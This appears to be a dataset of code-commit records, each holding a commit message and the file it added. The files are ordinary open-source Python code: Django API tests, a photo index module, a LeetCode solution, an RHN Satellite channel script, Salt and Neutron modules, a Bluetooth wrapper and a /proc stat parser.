"""
Ensure we can add a plugin to an api only as superusers.
"""
self.client.login(username='jane', password='jane123jane')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_api_add_plugin_wrong_name(self):
"""
Ensure we can't add a plugin to an api that doesn't exist.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'na-ah',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(response.data['errors'], 'Invalid plugin name')
def test_api_add_plugin_modify_partially_config(self):
"""
Ensure we can partially modify a plugin configuration.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
expected_res = response.data
expected_res['config'].update({'anonymous': 'citizen-four'})
data.update({'config': {'anonymous': 'citizen-four'}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(response.data, expected_res)
def test_api_add_plugin_no_extra_keys(self):
"""
Ensure we can't add arguments not defined on plugin's schema.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
data.update({'config': {'you_shall_not_pass': True}})
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| apache-2.0 | Python |
|
b29fe95eb2cb86a7ae9170fbf8ceb2533bc84578 | Add the photo.index module (with minimal functionality so far). | RKrahl/photo-tools | photo/index.py | photo/index.py | """Provide the class Index which represents an index of photos.
"""
import os
import os.path
import fnmatch
from collections import MutableSequence
import yaml
class Index(MutableSequence):
defIdxFilename = ".index.yaml"
def __init__(self, idxfile=None, imgdir=None):
super(Index, self).__init__()
self.directory = None
self.idxfilename = None
self.items = []
if idxfile:
self.read(idxfile)
elif imgdir:
self.readdir(imgdir)
def __len__(self):
return len(self.items)
def __getitem__(self, index):
return self.items.__getitem__(index)
def __setitem__(self, index, value):
self.items.__setitem__(index, value)
def __delitem__(self, index):
self.items.__delitem__(index)
def insert(self, index, value):
self.items.insert(index, value)
def _idxfilename(self, idxfile):
"""Determine the index file name for reading and writing.
"""
if idxfile is not None:
return os.path.abspath(idxfile)
elif self.idxfilename is not None:
return self.idxfilename
else:
d = self.directory if self.directory is not None else os.getcwd()
return os.path.abspath(os.path.join(d, self.defIdxFilename))
def readdir(self, imgdir):
"""Create a new index of all image files in a directory.
"""
self.directory = os.path.abspath(imgdir)
self.items = []
for f in sorted(os.listdir(self.directory)):
if (os.path.isfile(os.path.join(self.directory,f)) and
fnmatch.fnmatch(f, '*.jpg')):
self.items.append({'filename':f, 'tags':[]})
def read(self, idxfile=None):
"""Read the index from a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'rt') as f:
self.items = yaml.load(f)
def write(self, idxfile=None):
"""Write the index to a file.
"""
self.idxfilename = self._idxfilename(idxfile)
self.directory = os.path.dirname(self.idxfilename)
with open(self.idxfilename, 'wt') as f:
yaml.dump(self.items, f, default_flow_style=False)
| apache-2.0 | Python |
|
eff993eac0924299cd273d0c582e24c57f2c4a84 | Add 263-ugly-number.py | mvj3/leetcode | 263-ugly-number.py | 263-ugly-number.py | """
Question:
Ugly Number
Write a program to check whether a given number is an ugly number.
Ugly numbers are positive numbers whose prime factors only include 2, 3, 5. For example, 6, 8 are ugly while 14 is not ugly since it includes another prime factor 7.
Note that 1 is typically treated as an ugly number.
Credits:
Special thanks to @jianchao.li.fighter for adding this problem and creating all test cases.
Performance:
1. Total Accepted: 19816 Total Submissions: 60714 Difficulty: Easy
2. Your runtime beats 60.64% of python submissions.
"""
class Solution(object):
def isUgly(self, num):
"""
:type num: int
:rtype: bool
"""
if num == 0:
return False
for ugly_divisor in [2, 3, 5]:
while (num % ugly_divisor) == 0:
num /= ugly_divisor
return num == 1
assert Solution().isUgly(0) is False
assert Solution().isUgly(1) is True
assert Solution().isUgly(2) is True
assert Solution().isUgly(3) is True
assert Solution().isUgly(4) is True
assert Solution().isUgly(5) is True
assert Solution().isUgly(6) is True
assert Solution().isUgly(7) is False
assert Solution().isUgly(8) is True
assert Solution().isUgly(9) is True
assert Solution().isUgly(10) is True
assert Solution().isUgly(11) is False
assert Solution().isUgly(12) is True
assert Solution().isUgly(14) is False
assert Solution().isUgly(-2147483648) is False
| mit | Python |
|
063096a5b52945666ec2d61bfe5201ad53461614 | Create rhn-channel-add-scl.py | vladionescu/RHN-Scripts | rhn-channel-add-scl.py | rhn-channel-add-scl.py | #!/usr/bin/python
import xmlrpclib
import sys, array
"""RHN Satellite API setup"""
SATELLITE_URL = "https://rhn.domain.tld/rpc/api"
SATELLITE_LOGIN = "username"
SATELLITE_PASSWORD = "password"
"""If the user didn't specify any hosts, show usage."""
if len(sys.argv) < 2:
sys.exit("Usage:\n\t"+sys.argv[0]+" <hostname> [hostname] ...")
"""Connect to RHN Satellite API"""
client = xmlrpclib.Server(SATELLITE_URL, verbose=0)
key = client.auth.login(SATELLITE_LOGIN, SATELLITE_PASSWORD)
# systems we will add channel to
ids = array.array('i')
# channel we will add to systems
to_add = ''
for hostname in sys.argv[1:]:
"""
Assume every argument is a hostname.
Search my RHN Satellite systems for any
system whose hostname starts with any
the arguments given.
Takes the IDs of all found systems and
stores them in a (global) variable.
"""
# get a list of all systems that have this hostname
systems = client.system.search.hostname(key, hostname)
# add these system's ids to the list of global ids
for system in systems:
ids.append(system['id'])
if len(ids) != 0:
"""
If systems were found, get the first
one and find the name of the SCL
channel.
Otherwise, throw an error and exit.
"""
# try to find SCL in the list of channels this system is
# NOT currently subscribed to
channels = client.system.listSubscribableChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
if len(to_add) < 2:
"""
If the channel was not found, try to find SCL in the list
of channels this system IS subscribed to. The API
doesn't allow listing of all channels associated with a sys.
"""
channels = client.system.listSubscribedChildChannels(key, ids[0])
for channel in channels:
"""
Search through all returned channels for
the SCL channel and save its name.
"""
if channel['label'].find('scl-') != -1:
to_add = channel['label']
break
else:
sys.stderr.write('No systems were found')
exit(1)
for id in ids:
"""
Add the SCL channel to every system found above.
"""
# need to get all subscribed channels first
# since setChildChannels is absolute.
current_channels = client.system.listSubscribedChildChannels(key, id)
# create an array of the channels system will be subscribed to
# and include existing channels.
channels = []
for channel in current_channels:
channels.append(channel['label'])
for channel in channels:
# if the channel to be added already exists, don't double add
if channel == to_add:
break
else:
# if the channel doesn't already exist, add it!
channels.append(to_add)
# finally, set all those channels as the current subscriptions
client.system.setChildChannels(key, id, channels)
# write a success message
print("\033[1;32mSuccess:\033[1;m\nSystem "+str(id)+": "+str(channels))
"""Kill the connection to RHN"""
client.auth.logout(key)
| mit | Python |
|
cd44e4a62e8c8f8ddba0634ccc0bb157f7745726 | add 129 | EdisonAlgorithms/ProjectEuler,zeyuanxy/project-euler,zeyuanxy/project-euler,zeyuanxy/project-euler,EdisonAlgorithms/ProjectEuler,EdisonAlgorithms/ProjectEuler,zeyuanxy/project-euler,EdisonAlgorithms/ProjectEuler | vol3/129.py | vol3/129.py | def A(n):
if n % 5 == 0:
return 1
x = 1
ret = 1
while x != 0:
x = (x * 10 + 1) % n
ret += 1
return ret
if __name__ == "__main__":
LIMIT = 10 ** 6
i = LIMIT + 1
while A(i) <= LIMIT:
i += 2
print i
| mit | Python |
|
0ede4e22370a3f8217fee8ff995a9c7057d8b00b | Add test for redis test helper | praekelt/vumi-http-retry-api,praekelt/vumi-http-retry-api | vumi_http_retry/tests/test_redis.py | vumi_http_retry/tests/test_redis.py | import json
from twisted.trial.unittest import TestCase
from twisted.internet.defer import inlineCallbacks
from vumi_http_retry.tests.redis import create_client, zitems
class TestRedis(TestCase):
@inlineCallbacks
def setUp(self):
self.redis = yield create_client()
@inlineCallbacks
def tearDown(self):
yield self.redis.delete('foo')
yield self.redis.transport.loseConnection()
@inlineCallbacks
def test_add_request(self):
self.assertEqual((yield zitems(self.redis, 'foo')), [])
yield self.redis.zadd('foo', 1, json.dumps({'bar': 23}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
])
yield self.redis.zadd('foo', 2, json.dumps({'baz': 42}))
self.assertEqual((yield zitems(self.redis, 'foo')), [
(1, {'bar': 23}),
(2, {'baz': 42}),
])
| bsd-3-clause | Python |
|
d0237f2b77a49933a4b22b43f967e414be196ff4 | Add sysmod module to replace old introspection modules | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | salt/modules/sysmod.py | salt/modules/sysmod.py | '''
The sys module provides information about the available functions on the
minion.
'''
def __virtual__():
'''
Return as sys
'''
return 'sys'
def doc(module=''):
'''
Return the docstrings for all modules, these strings are aggregated into
a single document on the master for easy reading.
CLI Example::
salt \* sys.doc
'''
docs = {}
for fun in __salt__:
if fun.startswith(module):
docs[fun] = __salt__[fun].__doc__
return docs
def list_functions(module=''):
'''
List the functions. Optionally, specify a module to list from.
CLI Example::
salt \* sys.list_functions
'''
names = set()
for func in __salt__:
if module:
if func.startswith('{0}.'.format(module)):
names.add(func)
else:
names.add(func)
return sorted(names)
def list_modules():
'''
List the modules loaded on the minion
CLI Example::
salt \* sys.list_modules
'''
modules = set()
for func in __salt__:
comps = func.split('.')
if len(comps) < 2:
continue
modules.add(comps[0])
return sorted(modules)
def reload_modules():
    '''
    Tell the minion to reload its execution modules.

    CLI Example::

        salt '*' sys.reload_modules
    '''
    # The request is intercepted inside minion.py before it ever reaches this
    # body, so all that is left to do here is report success.
    return True
| apache-2.0 | Python |
|
fa55ceb71ff254f8ed3413a35acfe20da7c03a91 | Create BT Comm wrapper class | javatechs/RxCmd,javatechs/RxCmd,javatechs/RxCmd | rxbtcomm.py | rxbtcomm.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<programmingrobotsstudygroup@gmail.com>
# See LICENSE for details.
import bluetooth
import logging
class RxBtComm(object):
    """Bluetooth RFCOMM communication wrapper.

    Attributes:
        addr: string Bluetooth device address (e.g. 'xx:xx:xx:xx:xx:xx').
        name: optional human-readable device name.
        sock: the active BluetoothSocket, or None when disconnected.
    """
    logging.basicConfig(level=logging.DEBUG)

    def __init__(self, addr, name=None):
        """Return a RxBtComm object.

        param *addr* device address
        param *name* device name
        """
        self.addr = addr
        self.name = name
        self.sock = None

    def connect(self, port=1):
        """Open an RFCOMM connection to ``self.addr``.

        param *port* RFCOMM channel to use (default 1, as before)
        Returns the looked-up device name on success, '' on failure.
        """
        try:
            self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
            self.sock.connect((self.addr, port))
            return bluetooth.lookup_name(self.addr)
        except Exception as e:
            # Best-effort: log and report failure via the empty-string return.
            logging.exception(e)
            return ''

    def disconnect(self):
        """Close the socket (errors are logged, not raised) and reset state."""
        try:
            self.sock.close()
        except Exception as e:
            logging.exception(e)
        self.sock = None

    def send(self, cmd):
        """Send a command string to the connected host."""
        self.sock.send(cmd)

    def recieve(self, size=1024):
        """Receive up to ``size`` bytes of response from the host.

        BUG FIX: this previously called self.sock.recieve(cmd) where 'cmd'
        was undefined and BluetoothSocket has no 'recieve' method; the
        correct socket call is recv(). The method name keeps its original
        spelling for backward compatibility with existing callers.
        """
        return self.sock.recv(size)
### Replace xx:xx:xx:xx:xx:xx with your test device address
#test = RXComm('xx:xx:xx:xx:xx:xx', 'Test Device')
#test.connect()
#test.send('date')
#test.disconnect()
| apache-2.0 | Python |
|
4053aa99100e2fdc1a342a472492f53138a66d6b | Add internal utils module | lisongmin/pies,AbsoluteMSTR/pies,AbsoluteMSTR/pies,timothycrosley/pies,timothycrosley/pies,lisongmin/pies | pies/_utils.py | pies/_utils.py | """
pies/_utils.py
Utils internal to the pies library and not meant for direct external usage.
Copyright (C) 2013 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def with_metaclass(meta, *bases):
    """
    Enables use of meta classes across Python Versions.
    taken from jinja2/_compat.py

    Use it like this::

        class BaseForm(object):
            pass

        class FormType(type):
            pass

        class Form(with_metaclass(FormType, BaseForm)):
            pass
    """
    # Trick: return a throwaway class whose metaclass intercepts subclassing.
    # When Python later executes ``class Form(temporary_class):``, it calls
    # metaclass.__new__ with the *real* name/dict, and we build the final
    # class directly with ``meta`` and the originally requested ``bases`` --
    # so the temporary class never appears in Form's MRO.
    class metaclass(meta):
        # Delegate instantiation/initialisation straight to ``type`` so the
        # temporary class itself behaves like a plain class object.
        __call__ = type.__call__
        __init__ = type.__init__

        def __new__(cls, name, this_bases, d):
            if this_bases is None:
                # First call (below): create the placeholder class itself.
                return type.__new__(cls, name, (), d)
            # Second call (user's class statement): build the real class
            # with the intended metaclass and bases.
            return meta(name, bases, d)
    # ``None`` for bases is the sentinel that routes the first creation
    # through the placeholder branch above.
    return metaclass('temporary_class', None, {})
def unmodified_isinstance(*bases):
    """
    When called in the form MyOverrideClass(unmodified_isinstance(BuiltInClass))
    it allows calls against passed in built in instances to pass even if there
    not a subclass
    """
    class _IsInstanceDelegator(type):
        # Route isinstance() checks to the wrapped built-in bases, so plain
        # built-in instances still satisfy isinstance(x, MyOverrideClass).
        def __instancecheck__(cls, instance):
            return isinstance(instance, bases)

    return with_metaclass(_IsInstanceDelegator, *bases)
| mit | Python |
|
dda01f555231b93b91b71a528c210dd722e370d2 | Add flat type driver unittests | gkotton/vmware-nsx,gkotton/vmware-nsx | neutron/tests/unit/ml2/test_type_flat.py | neutron/tests/unit/ml2/test_type_flat.py | # Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import exceptions as exc
import neutron.db.api as db
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import type_flat
from neutron.tests import base
FLAT_NETWORKS = 'flat_net1, flat_net2'
class FlatTypeTest(base.BaseTestCase):
    """Exercise the ML2 flat network type driver."""

    def setUp(self):
        super(FlatTypeTest, self).setUp()
        db.configure_db()
        self.driver = type_flat.FlatTypeDriver()
        self.driver._parse_networks(FLAT_NETWORKS)
        self.session = db.get_session()
        self.addCleanup(db.clear_db)

    def _get_allocation(self, session, segment):
        # Fetch the persisted allocation row for the segment's physnet.
        query = session.query(type_flat.FlatAllocation)
        return query.filter_by(
            physical_network=segment[api.PHYSICAL_NETWORK]).first()

    def _flat_segment(self, physical_network):
        # Build a flat provider segment dict for the given physical network.
        return {api.NETWORK_TYPE: p_const.TYPE_FLAT,
                api.PHYSICAL_NETWORK: physical_network}

    def test_validate_provider_segment(self):
        self.driver.validate_provider_segment(self._flat_segment('flat_net1'))

    def test_validate_provider_segment_without_physnet_restriction(self):
        self.driver._parse_networks('*')
        self.driver.validate_provider_segment(
            self._flat_segment('other_flat_net'))

    def test_validate_provider_segment_with_missing_physical_network(self):
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          {api.NETWORK_TYPE: p_const.TYPE_FLAT})

    def test_validate_provider_segment_with_unsupported_physical_network(self):
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          self._flat_segment('other_flat_net'))

    def test_validate_provider_segment_with_unallowed_segmentation_id(self):
        segment = self._flat_segment('flat_net1')
        segment[api.SEGMENTATION_ID] = 1234
        self.assertRaises(exc.InvalidInput,
                          self.driver.validate_provider_segment,
                          segment)

    def test_reserve_provider_segment(self):
        segment = self._flat_segment('flat_net1')
        self.driver.reserve_provider_segment(self.session, segment)
        alloc = self._get_allocation(self.session, segment)
        self.assertEqual(segment[api.PHYSICAL_NETWORK], alloc.physical_network)

    def test_release_segment(self):
        segment = self._flat_segment('flat_net1')
        self.driver.reserve_provider_segment(self.session, segment)
        self.driver.release_segment(self.session, segment)
        self.assertIsNone(self._get_allocation(self.session, segment))

    def test_reserve_provider_segment_already_reserved(self):
        segment = self._flat_segment('flat_net1')
        self.driver.reserve_provider_segment(self.session, segment)
        self.assertRaises(exc.FlatNetworkInUse,
                          self.driver.reserve_provider_segment,
                          self.session, segment)

    def test_allocate_tenant_segment(self):
        self.assertIsNone(self.driver.allocate_tenant_segment(self.session))
| apache-2.0 | Python |
|
b52b4cb39029d55a06e15b527cb4789e2988093d | Add word2vec example | bcanvural/thesis,bcanvural/thesis | word2vec.py | word2vec.py | from pyspark.sql import SparkSession
from pyspark.ml.feature import Word2Vec
def main():
    """Train a toy Word2Vec model and print each document's averaged vector."""
    spark = SparkSession.builder \
        .appName("Spark CV-job ad matching") \
        .config("spark.some.config.option", "some-value") \
        .master("local[*]") \
        .getOrCreate()

    # Input data: each row is a bag of words from a sentence or document.
    documentDF = spark.createDataFrame([
        ("Hi I heard about Spark".split(" "), ),
        ("I wish Java could use case classes".split(" "), ),
        ("Logistic regression models are neat".split(" "), )
    ], ["text"])

    # Learn a mapping from words to 3-dimensional vectors.
    # (The original code also fit a second model on a two-row frame and
    # discarded it unused; that dead work has been removed.)
    word2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol="text",
                        outputCol="result")
    model = word2Vec.fit(documentDF)

    result = model.transform(documentDF)
    for row in result.collect():
        text, vector = row
        print("Text: [%s] => \nVector: %s\n" % (", ".join(text), str(vector)))

    # Release local cluster resources instead of leaving the session open.
    spark.stop()
if __name__ == '__main__':
    # Run the demo only when executed as a script, not on import.
    main()
| mit | Python |
|
9607c55eacfd58704a4e83a2476471aa2da6124c | add package py-doxypypy (#3284) | krafczyk/spack,mfherbst/spack,krafczyk/spack,tmerrick1/spack,EmreAtes/spack,iulian787/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,LLNL/spack,tmerrick1/spack,EmreAtes/spack,matthiasdiener/spack,EmreAtes/spack,skosukhin/spack,iulian787/spack,lgarren/spack,iulian787/spack,iulian787/spack,mfherbst/spack,tmerrick1/spack,TheTimmy/spack,TheTimmy/spack,tmerrick1/spack,krafczyk/spack,skosukhin/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,skosukhin/spack,lgarren/spack,mfherbst/spack,mfherbst/spack,krafczyk/spack,LLNL/spack,LLNL/spack,lgarren/spack,iulian787/spack,TheTimmy/spack,tmerrick1/spack,krafczyk/spack,matthiasdiener/spack,matthiasdiener/spack,matthiasdiener/spack,skosukhin/spack,lgarren/spack,lgarren/spack,skosukhin/spack,EmreAtes/spack,LLNL/spack | var/spack/repos/builtin/packages/py-doxypypy/package.py | var/spack/repos/builtin/packages/py-doxypypy/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyDoxypypy(PythonPackage):
    """A Doxygen filter for Python.

    A more Pythonic version of doxypy, a Doxygen filter for Python.
    """

    homepage = "https://github.com/Feneric/doxypypy"
    url = "https://pypi.io/packages/source/d/doxypypy/doxypypy-0.8.8.6.tar.gz"

    # Single published release; the second argument is the source md5 checksum.
    version('0.8.8.6', '6b3fe4eff5d459400071b626333fe15f')

    # setuptools is only required at build/install time, not at runtime.
    depends_on('py-setuptools', type='build')
| lgpl-2.1 | Python |
|
83fa6b23563903192376a3419b460b9b06479248 | Add procstat.py | gyulkkajo/linux-util | src/procstat.py | src/procstat.py | import os.path
import argparse
import logging
logging.basicConfig(level=logging.DEBUG)
class Procstat():
    """Parse and expose the fields of /proc/<pid>/stat for one process."""

    # Template for the per-process stat file.
    PROCSTATPATH = '/proc/%d/stat'

    # Field names in the order they appear in /proc/<pid>/stat; see the
    # proc(5) man page for the meaning of each field.
    STATLIST = (
        'pid',
        'comm',
        'state',
        'ppid',
        'pgrp',
        'session',
        'tty_nr',
        'tpgid',
        'flags',
        'minflt',
        'cminflt',
        'mjflt',
        'cmajflt',
        'utime',
        'stime',
        'cutime',
        'cstime',
        'priority',
        'nice',
        'num_threads',
        'itrealvalue',
        'starttime',
        'vsize',
        'rss',
        'rsslim',
        'startcode',
        'endcode',
        'startstack',
        'kstkesp',
        'kstkeip',
        'signal',
        'blocked',
        'sigignore',
        'sigcatch',
        'wchan',
        'nswap',
        'cnswap',
        'exit_signal',
        'processor',
        'rt_priority',
        'policy',
        'delayacct_blkio_ticks',
        'guest_time',
        'cguest_time')

    def __init__(self, pid):
        """Read and parse /proc/<pid>/stat into the ``self.stat`` dict.

        param *pid* process id to inspect
        """
        # BUG FIX: this previously formatted the path with the global
        # 'args.pid', which only exists when the file is run as a script;
        # any library use raised NameError. Use the 'pid' parameter.
        fstat = self.PROCSTATPATH % pid
        if not os.path.exists(fstat):
            # Preserve original behavior: log and leave the instance
            # without a 'stat' attribute rather than raising.
            logging.error('PID is not valid')
            return None
        with open(fstat, 'r') as f:
            # NOTE(review): split() on whitespace assumes the comm field
            # contains no spaces -- a process name like '(Web Content)'
            # would shift every later field. TODO confirm acceptable.
            procStat = f.readline().split()

        self.stat = {}
        for i in range(len(self.STATLIST)):
            self.stat[self.STATLIST[i]] = procStat[i]

        # Strip the parentheses the kernel puts around the command name.
        strComm = self.stat['comm']
        self.stat['comm'] = str(strComm[1:len(strComm) - 1])

    def __str__(self):
        """Return all fields as a compact 'name(value)' concatenation."""
        rl = ''
        for i in self.STATLIST:
            rl += '%s(%s)' % (i, self.stat[i])
        return rl

    def getStat(self, name):
        """Return the value of field ``name``, or '' if the value is falsy.

        Raises KeyError for unknown field names (unchanged behavior).
        """
        return self.stat[name] if self.stat[name] else ''

    def printStat(self, readable=False):
        """Print one 'name : value' line per field.

        param *readable* accepted for backward compatibility; currently
        unused by the implementation.
        """
        l = ''
        for i in self.STATLIST:
            v = self.stat[i]
            l += '%-12s : %s\n' % (i, v)
        print(l)
if __name__ == '__main__':
    # Command-line entry point: parse the target pid and dump its stat fields.
    argp = argparse.ArgumentParser(
        description='Process stat information parser')
    argp.add_argument('pid', type=int, help='Pid')
    args = argp.parse_args()

    Procstat(args.pid).printStat()
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.